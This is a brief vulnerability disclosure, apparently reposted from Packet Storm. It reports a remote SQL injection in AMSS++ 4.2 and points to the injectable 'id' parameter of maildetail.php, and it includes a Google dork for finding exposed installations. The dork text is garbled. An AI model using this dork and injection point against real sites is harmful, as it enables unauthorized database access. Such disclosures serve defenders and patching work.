AMSS++ 4.2 SQL Injection

AMSS++ version 4.2 suffers from a remote SQL injection vulnerability.


MD5 | a0c471ac6c5acba2071f2f18f384bec9

Download
====================================================================================================================================
| # Title     : AMSS++ v 4.2 Sql Injection Vulnerability                                                                           |
| # Author    : indoushka                                                                                                          |
| # Tested on : windows 10 FranASSais V.(Pro) / browser : Mozilla firefox 65.0(32-bit)                                               | 
| # Vendor    : http://amssplus.ubn4.go.th/amssplus_download/                                                                      |  
| # Dork      : a1a,a,dega,a,3a1a,<<a1a1a,a1a,a,PSa,2a,SSa1a,a,a,PSa1 Google Chrome "AMSS++"                                                                                   |
====================================================================================================================================

poc :


[+] Dorking Adegn Google Or Other Search Enggine.

[+] Use payload : /modules/mail/main/maildetail.php?id=174

[+] http://127.0.0.1/cri1amss/modules/mail/main/maildetail.php?id=174 <==== inject here


Greetings to :=========================================================================================================================
                                                                                                                                      |
jericho * Larry W. Cashdollar * brutelogic* shadow_00715* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * ViRuS_Ra3cH * yasMouh   |        
                                                                                                                                      |
=======================================================================================================================================

Source: packetstormsecurity.com
Related Posts